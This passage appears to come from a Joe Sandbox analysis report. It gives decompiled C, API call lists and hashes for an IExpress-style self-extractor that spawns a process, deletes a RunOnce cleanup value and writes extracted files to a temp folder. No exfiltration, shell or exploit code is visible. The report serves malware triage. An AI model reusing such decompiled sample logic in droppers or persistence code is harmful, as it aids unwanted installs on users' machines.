                                                                      					E011D44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                                                                      					L11:
                                                                      					_t49 = 0;
                                                                      					L12:
                                                                      					_t22 = _t49;
                                                                      					goto L13;
                                                                      				}
                                                                      				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                      				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                      				_t44 = _v528;
                                                                      				_t53 =  *0x11d8a28; // 0x0
                                                                      				if(_t53 == 0) {
                                                                      					_t34 =  *0x11d9a2c; // 0x0
                                                                      					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                      						_t34 = _t44 & 0xff000000;
                                                                      						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                      							 *0x11d9a2c = _t44;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				E011D411B(_t34, _t44);
                                                                      				CloseHandle(_v544.hThread);
                                                                      				CloseHandle(_v544);
                                                                      				if(( *0x11d9a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                      					goto L12;
                                                                      				} else {
                                                                      					goto L11;
                                                                      				}
                                                                      			}



















                                                                      APIs
                                                                      • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 011D4033
                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 011D4049
                                                                      • GetExitCodeProcess.KERNELBASE ref: 011D405C
                                                                      • CloseHandle.KERNEL32(?), ref: 011D409C
                                                                      • CloseHandle.KERNEL32(?), ref: 011D40A8
                                                                      • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 011D40DC
                                                                      • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 011D40E9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                      • String ID:
                                                                      • API String ID: 3183975587-0
                                                                      • Opcode ID: 7e2d8405ea256f7ab8d01a7fec90e196fb5abd5f78e799148a4771370342d1a5
                                                                      • Instruction ID: 1b3bf1a133fd071dd5da876fb05557c5de262c891b52f7e7cb42392fa377a19b
                                                                      • Opcode Fuzzy Hash: 7e2d8405ea256f7ab8d01a7fec90e196fb5abd5f78e799148a4771370342d1a5
                                                                      • Instruction Fuzzy Hash: 3A31B131642228ABEB389F75EC48FAB777CEB94714F1001A9F515D2995C7305DC5CB21
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E011D51E5(void* __eflags) {
                                                                      				int _t5;
                                                                      				void* _t6;
                                                                      				void* _t28;
                                                                      
                                                                      				_t1 = E011D468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                      				_t28 = LocalAlloc(0x40, _t1);
                                                                      				if(_t28 != 0) {
                                                                      					if(E011D468F("UPROMPT", _t28, _t29) != 0) {
                                                                      						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                      						if(_t5 != 0) {
                                                                      							_t6 = E011D44B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                      							LocalFree(_t28);
                                                                      							if(_t6 != 6) {
                                                                      								 *0x11d9124 = 0x800704c7;
                                                                      								L10:
                                                                      								return 0;
                                                                      							}
                                                                      							 *0x11d9124 = 0;
                                                                      							L6:
                                                                      							return 1;
                                                                      						}
                                                                      						LocalFree(_t28);
                                                                      						goto L6;
                                                                      					}
                                                                      					E011D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                      					LocalFree(_t28);
                                                                      					 *0x11d9124 = 0x80070714;
                                                                      					goto L10;
                                                                      				}
                                                                      				E011D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                      				 *0x11d9124 = E011D6285();
                                                                      				goto L10;
                                                                      			}


                                                                      APIs
                                                                        • Part of subcall function 011D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 011D46A0
                                                                        • Part of subcall function 011D468F: SizeofResource.KERNEL32(00000000,00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46A9
                                                                        • Part of subcall function 011D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 011D46C3
                                                                        • Part of subcall function 011D468F: LoadResource.KERNEL32(00000000,00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46CC
                                                                        • Part of subcall function 011D468F: LockResource.KERNEL32(00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46D3
                                                                        • Part of subcall function 011D468F: memcpy_s.MSVCRT ref: 011D46E5
                                                                        • Part of subcall function 011D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46EF
                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,011D2F4D,?,00000002,00000000), ref: 011D5201
                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 011D5250
                                                                        • Part of subcall function 011D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 011D4518
                                                                        • Part of subcall function 011D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 011D4554
                                                                        • Part of subcall function 011D6285: GetLastError.KERNEL32(011D5BBC), ref: 011D6285
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                      • String ID: <None>$UPROMPT
                                                                      • API String ID: 957408736-2980973527
                                                                      • Opcode ID: 8eed36638429b5efd002af4d9996d67ec54b0ae7576a1bca750336b41e997052
                                                                      • Instruction ID: 5bfb7378b1168aee49426d18510b4ba399ae464852685122392665b4821f8b7c
                                                                      • Opcode Fuzzy Hash: 8eed36638429b5efd002af4d9996d67ec54b0ae7576a1bca750336b41e997052
                                                                      • Instruction Fuzzy Hash: 991104B1203205FBE76DAAB59C89F3B61AEEF89298B00403DF652D6584DB798C404234
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E011D1FE1(void* __ecx) {
                                                                      				void* _v8;
                                                                      				long _t4;
                                                                      
                                                                      				if( *0x11d8530 != 0) {
                                                                      					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                      					if(_t4 == 0) {
                                                                      						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
                                                                      						return RegCloseKey(_v8);
                                                                      					}
                                                                      				}
                                                                      				return _t4;
                                                                      			}


                                                                      APIs
                                                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,011D538C,?,?,011D538C), ref: 011D2005
                                                                      • RegDeleteValueA.KERNELBASE(011D538C,wextract_cleanup0,?,?,011D538C), ref: 011D2017
                                                                      • RegCloseKey.ADVAPI32(011D538C,?,?,011D538C), ref: 011D2020
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: CloseDeleteOpenValue
                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                      • API String ID: 849931509-702805525
                                                                      • Opcode ID: 2028e52592c8a33a04edb2383c80ce4b7d7c6d0a4d855a636b954bd3c2754841
                                                                      • Instruction ID: 2e75d4269fb614e6d41681ec6a6a0f85457f3b2c4b455ab6ea3e8ef2499bc24d
                                                                      • Opcode Fuzzy Hash: 2028e52592c8a33a04edb2383c80ce4b7d7c6d0a4d855a636b954bd3c2754841
                                                                      • Instruction Fuzzy Hash: D0E08630553318BBEB39DF91FC4AF597B2AFF01740F1002A8FA14A1055E7715A90D704
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                      			E011D4CD0(char* __edx, long _a4, int _a8) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t29;
                                                                      				int _t30;
                                                                      				long _t32;
                                                                      				signed int _t33;
                                                                      				long _t35;
                                                                      				long _t36;
                                                                      				struct HWND__* _t37;
                                                                      				long _t38;
                                                                      				long _t39;
                                                                      				long _t41;
                                                                      				long _t44;
                                                                      				long _t45;
                                                                      				long _t46;
                                                                      				signed int _t50;
                                                                      				long _t51;
                                                                      				char* _t58;
                                                                      				long _t59;
                                                                      				char* _t63;
                                                                      				long _t64;
                                                                      				CHAR* _t71;
                                                                      				CHAR* _t74;
                                                                      				int _t75;
                                                                      				signed int _t76;
                                                                      
                                                                      				_t69 = __edx;
                                                                      				_t29 =  *0x11d8004; // 0xdc3102d5
                                                                      				_t30 = _t29 ^ _t76;
                                                                      				_v8 = _t30;
                                                                      				_t75 = _a8;
                                                                      				if( *0x11d91d8 == 0) {
                                                                      					_t32 = _a4;
                                                                      					__eflags = _t32;
                                                                      					if(_t32 == 0) {
                                                                      						_t33 = E011D4E99(_t75);
                                                                      						L35:
                                                                      						return E011D6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                      					}
                                                                      					_t35 = _t32 - 1;
                                                                      					__eflags = _t35;
                                                                      					if(_t35 == 0) {
                                                                      						L9:
                                                                      						_t33 = 0;
                                                                      						goto L35;
                                                                      					}
                                                                      					_t36 = _t35 - 1;
                                                                      					__eflags = _t36;
                                                                      					if(_t36 == 0) {
                                                                      						_t37 =  *0x11d8584; // 0x0
                                                                      						__eflags = _t37;
                                                                      						if(_t37 != 0) {
                                                                      							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                      						}
                                                                      						_t54 = 0x11d91e4;
                                                                      						_t58 = 0x11d91e4;
                                                                      						do {
                                                                      							_t38 =  *_t58;
                                                                      							_t58 =  &(_t58[1]);
                                                                      							__eflags = _t38;
                                                                      						} while (_t38 != 0);
                                                                      						_t59 = _t58 - 0x11d91e5;
                                                                      						__eflags = _t59;
                                                                      						_t71 =  *(_t75 + 4);
                                                                      						_t73 =  &(_t71[1]);
                                                                      						do {
                                                                      							_t39 =  *_t71;
                                                                      							_t71 =  &(_t71[1]);
                                                                      							__eflags = _t39;
                                                                      						} while (_t39 != 0);
                                                                      						_t69 = _t71 - _t73;
                                                                      						_t30 = _t59 + 1 + _t71 - _t73;
                                                                      						__eflags = _t30 - 0x104;
                                                                      						if(_t30 >= 0x104) {
                                                                      							L3:
                                                                      							_t33 = _t30 | 0xffffffff;
                                                                      							goto L35;
                                                                      						}
                                                                      						_t69 = 0x11d91e4;
                                                                      						_t30 = E011D4702( &_v268, 0x11d91e4,  *(_t75 + 4));
                                                                      						__eflags = _t30;
                                                                      						if(__eflags == 0) {
                                                                      							goto L3;
                                                                      						}
                                                                      						_t41 = E011D476D( &_v268, __eflags);
                                                                      						__eflags = _t41;
                                                                      						if(_t41 == 0) {
                                                                      							goto L9;
                                                                      						}
                                                                      						_push(0x180);
                                                                      						_t30 = E011D4980( &_v268, 0x8302); // executed
                                                                      						_t75 = _t30;
                                                                      						__eflags = _t75 - 0xffffffff;
                                                                      						if(_t75 == 0xffffffff) {
                                                                      							goto L3;
                                                                      						}
                                                                      						_t30 = E011D47E0( &_v268);
                                                                      						__eflags = _t30;
                                                                      						if(_t30 == 0) {
                                                                      							goto L3;
                                                                      						}
                                                                      						 *0x11d93f4 =  *0x11d93f4 + 1;
                                                                      						_t33 = _t75;
                                                                      						goto L35;
                                                                      					}
                                                                      					_t44 = _t36 - 1;
                                                                      					__eflags = _t44;
                                                                      					if(_t44 == 0) {
                                                                      						_t54 = 0x11d91e4;
                                                                      						_t63 = 0x11d91e4;
                                                                      						do {
                                                                      							_t45 =  *_t63;
                                                                      							_t63 =  &(_t63[1]);
                                                                      							__eflags = _t45;
                                                                      						} while (_t45 != 0);
                                                                      						_t74 =  *(_t75 + 4);
                                                                      						_t64 = _t63 - 0x11d91e5;
                                                                      						__eflags = _t64;
                                                                      						_t69 =  &(_t74[1]);
                                                                      						do {
                                                                      							_t46 =  *_t74;
                                                                      							_t74 =  &(_t74[1]);
                                                                      							__eflags = _t46;
                                                                      						} while (_t46 != 0);
                                                                      						_t73 = _t74 - _t69;
                                                                      						_t30 = _t64 + 1 + _t74 - _t69;
                                                                      						__eflags = _t30 - 0x104;
                                                                      						if(_t30 >= 0x104) {
                                                                      							goto L3;
                                                                      						}
                                                                      						_t69 = 0x11d91e4;
                                                                      						_t30 = E011D4702( &_v268, 0x11d91e4,  *(_t75 + 4));
                                                                      						__eflags = _t30;
                                                                      						if(_t30 == 0) {
                                                                      							goto L3;
                                                                      						}
                                                                      						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                      						_t30 = E011D4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                      						__eflags = _t30;
                                                                      						if(_t30 == 0) {
                                                                      							goto L3;
                                                                      						}
                                                                      						E011D4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                      						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                      						__eflags = _t50;
                                                                      						if(_t50 != 0) {
                                                                      							_t51 = _t50 & 0x00000027;
                                                                      							__eflags = _t51;
                                                                      						} else {
                                                                      							_t51 = 0x80;
                                                                      						}
                                                                      						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                      						__eflags = _t30;
                                                                      						if(_t30 == 0) {
                                                                      							goto L3;
                                                                      						} else {
                                                                      							_t33 = 1;
                                                                      							goto L35;
                                                                      						}
                                                                      					}
                                                                      					_t30 = _t44 - 1;
                                                                      					__eflags = _t30;
                                                                      					if(_t30 == 0) {
                                                                      						goto L3;
                                                                      					}
                                                                      					goto L9;
                                                                      				}
                                                                      				if(_a4 == 3) {
                                                                      					_t30 = E011D4B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                      				}
                                                                      				goto L3;
                                                                      			}


                                                                      APIs
                                                                      • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 011D4DB5
                                                                      • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 011D4DDD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFileItemText
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                      • API String ID: 3625706803-2312194364
                                                                      • Opcode ID: ad146f6199b8acde438dbc7c04fec724585c1446b497c015dcdee7bb248f2fe7
                                                                      • Instruction ID: dff574c4c7fde2c4e421c6212ea7b7c31eec56b94f71f327d0c1d9435df42a4a
                                                                      • Opcode Fuzzy Hash: ad146f6199b8acde438dbc7c04fec724585c1446b497c015dcdee7bb248f2fe7
                                                                      • Instruction Fuzzy Hash: 174173362049129BDB3D8F3CD8446FE77A4EF65348F048668C88297E85DB31DA8AC750
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E011D4C37(signed int __ecx, int __edx, int _a4) {
                                                                      				struct _FILETIME _v12;
                                                                      				struct _FILETIME _v20;
                                                                      				FILETIME* _t14;
                                                                      				int _t15;
                                                                      				signed int _t21;
                                                                      
                                                                      				_t21 = __ecx * 0x18;
                                                                      				if( *((intOrPtr*)(_t21 + 0x11d8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                      					L5:
                                                                      					return 0;
                                                                      				} else {
                                                                      					_t14 =  &_v12;
                                                                      					_t15 = SetFileTime( *(_t21 + 0x11d8d74), _t14, _t14, _t14); // executed
                                                                      					if(_t15 == 0) {
                                                                      						goto L5;
                                                                      					}
                                                                      					return 1;
                                                                      				}
                                                                      			}









                                                                      APIs
                                                                      • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 011D4C54
                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 011D4C66
                                                                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 011D4C7E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Time$File$DateLocal
                                                                      • String ID:
                                                                      • API String ID: 2071732420-0
                                                                      • Opcode ID: 16b97c27bf953e0f02e749095306f8fed50e75d188b9c72f5a2a794055d6e173
                                                                      • Instruction ID: aacb7545e32576914b622b558b0063a0a602b4b8a443e35125f7daf9831af323
                                                                      • Opcode Fuzzy Hash: 16b97c27bf953e0f02e749095306f8fed50e75d188b9c72f5a2a794055d6e173
                                                                      • Instruction Fuzzy Hash: AAF06D7260121DAAAB2CDEA8DC49DBF7BEDEB04250744063AA916C2890FB34D554C7A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E011D487A(CHAR* __ecx, signed int __edx) {
                                                                      				void* _t7;
                                                                      				CHAR* _t11;
                                                                      				long _t18;
                                                                      				long _t23;
                                                                      
                                                                      				_t11 = __ecx;
                                                                      				asm("sbb edi, edi");
                                                                      				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                      				if((__edx & 0x00000100) == 0) {
                                                                      					asm("sbb esi, esi");
                                                                      					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                      				} else {
                                                                      					if((__edx & 0x00000400) == 0) {
                                                                      						asm("sbb esi, esi");
                                                                      						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                      					} else {
                                                                      						_t23 = 1;
                                                                      					}
                                                                      				}
                                                                      				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                      				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                      					return _t7;
                                                                      				} else {
                                                                      					E011D490C(_t11);
                                                                      					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                      				}
                                                                      			}








                                                                      APIs
                                                                      • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,011D4A23,?,011D4F67,*MEMCAB,00008000,00000180), ref: 011D48DE
                                                                      • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,011D4F67,*MEMCAB,00008000,00000180), ref: 011D4902
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 828804c7322019bd4820daad8c73bd808b75816d58b6254f8aa8872b0810eb1a
                                                                      • Instruction ID: e39b2d659be9b1a356d578fac3140213e2872e829e907562c5a49c123fc9ac7d
                                                                      • Opcode Fuzzy Hash: 828804c7322019bd4820daad8c73bd808b75816d58b6254f8aa8872b0810eb1a
                                                                      • Instruction Fuzzy Hash: ED016DA3E125702AF32C80799C89FB7551CCBDA675F1B0334BEEAE79C1E6644C0482E4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E011D4AD0(signed int _a4, void* _a8, long _a12) {
                                                                      				signed int _t9;
                                                                      				int _t12;
                                                                      				signed int _t14;
                                                                      				signed int _t15;
                                                                      				void* _t20;
                                                                      				struct HWND__* _t21;
                                                                      				signed int _t24;
                                                                      				signed int _t25;
                                                                      
                                                                      				_t20 =  *0x11d858c; // 0x270
                                                                      				_t9 = E011D3680(_t20);
                                                                      				if( *0x11d91d8 == 0) {
                                                                      					_push(_t24);
                                                                      					_t12 = WriteFile( *(0x11d8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                      					if(_t12 != 0) {
                                                                      						_t25 = _a12;
                                                                      						if(_t25 != 0xffffffff) {
                                                                      							_t14 =  *0x11d9400; // 0x9a800
                                                                      							_t15 = _t14 + _t25;
                                                                      							 *0x11d9400 = _t15;
                                                                      							if( *0x11d8184 != 0) {
                                                                      								_t21 =  *0x11d8584; // 0x0
                                                                      								if(_t21 != 0) {
                                                                      									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x11d93f8, 0);
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						_t25 = _t24 | 0xffffffff;
                                                                      					}
                                                                      					return _t25;
                                                                      				} else {
                                                                      					return _t9 | 0xffffffff;
                                                                      				}
                                                                      			}












                                                                      APIs
                                                                        • Part of subcall function 011D3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 011D369F
                                                                        • Part of subcall function 011D3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 011D36B2
                                                                        • Part of subcall function 011D3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 011D36DA
                                                                      • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 011D4B05
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                      • String ID:
                                                                      • API String ID: 1084409-0
                                                                      • Opcode ID: ef25c9f9e7b50f07b712cc8a3692824387b7805b46c4d80b0c3708cf261a1286
                                                                      • Instruction ID: de1a8d0779c77dfb229ebfcbf961a5a7064a42d70feef060573de9a91ca575a1
                                                                      • Opcode Fuzzy Hash: ef25c9f9e7b50f07b712cc8a3692824387b7805b46c4d80b0c3708cf261a1286
                                                                      • Instruction Fuzzy Hash: 0E01DD31203215ABD72C8F6CDC05F967B69FB54725F048235F939975D4C7709891C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E011D658A(char* __ecx, void* __edx, char* _a4) {
                                                                      				intOrPtr _t4;
                                                                      				char* _t6;
                                                                      				char* _t8;
                                                                      				void* _t10;
                                                                      				void* _t12;
                                                                      				char* _t16;
                                                                      				intOrPtr* _t17;
                                                                      				void* _t18;
                                                                      				char* _t19;
                                                                      
                                                                      				_t16 = __ecx;
                                                                      				_t10 = __edx;
                                                                      				_t17 = __ecx;
                                                                      				_t1 = _t17 + 1; // 0x11d8b3f
                                                                      				_t12 = _t1;
                                                                      				do {
                                                                      					_t4 =  *_t17;
                                                                      					_t17 = _t17 + 1;
                                                                      				} while (_t4 != 0);
                                                                      				_t18 = _t17 - _t12;
                                                                      				_t2 = _t18 + 1; // 0x11d8b40
                                                                      				if(_t2 < __edx) {
                                                                      					_t19 = _t18 + __ecx;
                                                                      					if(_t19 > __ecx) {
                                                                      						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                      						if( *_t8 != 0x5c) {
                                                                      							 *_t19 = 0x5c;
                                                                      							_t19 =  &(_t19[1]);
                                                                      						}
                                                                      					}
                                                                      					_t6 = _a4;
                                                                      					 *_t19 = 0;
                                                                      					while( *_t6 == 0x20) {
                                                                      						_t6 = _t6 + 1;
                                                                      					}
                                                                      					return E011D16B3(_t16, _t10, _t6);
                                                                      				}
                                                                      				return 0x8007007a;
                                                                      			}













                                                                      APIs
                                                                      • CharPrevA.USER32(011D8B3E,011D8B3F,00000001,011D8B3E,-00000003,?,011D60EC,011D1140,?), ref: 011D65BA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: CharPrev
                                                                      • String ID:
                                                                      • API String ID: 122130370-0
                                                                      • Opcode ID: 5d011033d0721bf6bc385188d643ead7aae58f01fa3c3e4e5924563d36d0b160
                                                                      • Instruction ID: 51d4ede68643b8f7e41ef0d56d855900c7c6085a42b19cda4b229ee1476893a6
                                                                      • Opcode Fuzzy Hash: 5d011033d0721bf6bc385188d643ead7aae58f01fa3c3e4e5924563d36d0b160
                                                                      • Instruction Fuzzy Hash: 77F04C321042509BE33E491D9884B66BFDE9B971D0F59026EE9EAC320DCB658CC6C7A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E011D621E() {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				signed int _t5;
                                                                      				void* _t9;
                                                                      				void* _t13;
                                                                      				void* _t19;
                                                                      				void* _t20;
                                                                      				signed int _t21;
                                                                      
                                                                      				_t5 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t5 ^ _t21;
                                                                      				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                      					0x4f0 = 2;
                                                                      					_t9 = E011D597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                      				} else {
